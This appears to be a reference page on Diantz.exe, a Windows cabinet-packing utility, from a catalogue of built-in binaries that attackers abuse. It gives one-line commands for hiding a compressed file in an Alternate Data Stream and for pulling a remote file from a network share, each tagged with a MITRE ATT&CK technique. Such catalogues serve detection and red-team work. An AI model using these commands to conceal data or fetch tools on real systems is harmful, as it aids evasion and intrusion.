.. /Diantz.exe
Star

Binary that package existing files into a cabinet (.cab) file


Paths:

Resources:
Acknowledgements:

Detection:

Alternate data streams

Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
Usecase: Hide data compressed into an Alternate Data Stream.
Privileges required: User
OS: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
MITRE ATT&CK®: T1564.004



Download

Download and compress a remote file and store it in a cab file on local machine.
diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
Usecase: Download and compress into a cab file.
Privileges required: User
OS: Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019
MITRE ATT&CK®: T1105